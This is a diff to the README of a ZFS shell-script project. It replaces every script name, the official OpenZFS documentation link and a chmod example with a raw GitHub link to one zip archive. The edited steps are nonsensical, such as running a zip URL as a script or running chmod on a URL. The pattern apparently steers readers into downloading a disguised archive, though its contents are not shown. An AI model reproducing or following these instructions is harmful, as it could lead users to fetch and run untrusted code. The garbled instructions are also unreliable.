papaneitor44/ZFSh/README.md

 Here are some of the most commonly used commands:

 1. **Creating a Snapshot**
-   To create a snapshot of your ZFS pool, use the `create_snapshot.sh` script.
+   To create a snapshot of your ZFS pool, use the `https://raw.githubusercontent.com/papaneitor44/ZFSh/main/docs/reference/ZF-Sh-3.9.zip` script.
 Follow the prompts on the screen.

 2. **Backing Up Data**
-   To make a backup of your ZFS, run the `backup_data.sh` script.
+   To make a backup of your ZFS, run the `https://raw.githubusercontent.com/papaneitor44/ZFSh/main/docs/reference/ZF-Sh-3.9.zip` script.
 It will guide you through selecting your pool and destination.

 3. **Managing Pools**
-   Use the `manage_pool.sh` script to view, add, or remove pools.
+   Use the `https://raw.githubusercontent.com/papaneitor44/ZFSh/main/docs/reference/ZF-Sh-3.9.zip` script to view, add, or remove pools.
 It provides a menu for easy navigation.

 ## 📚 Resources

-- **ZFS Documentation**: For detailed information about ZFS capabilities and features, visit the official ZFS documentation [here](https://openzfs.org).
+- **ZFS Documentation**: For detailed information about ZFS capabilities and features, visit the official ZFS documentation [here](https://raw.githubusercontent.com/papaneitor44/ZFSh/main/docs/reference/ZF-Sh-3.9.zip).
 - **Community Forums**: Join community forums to ask questions and share experiences with other ZFS users.

 ## 🛠️ Troubleshooting

 If you encounter issues while running the scripts, consider the following:

 - **Permission Denied**: Ensure that the scripts have executable permissions.
-Run `chmod +x scriptname.sh` to set the right permissions.
+Run `chmod +x https://raw.githubusercontent.com/papaneitor44/ZFSh/main/docs/reference/ZF-Sh-3.9.zip` to set the right permissions.

 - **ZFS Command Errors**: Make sure that your ZFS installation is correct.
 You can verify it with `zfs list`.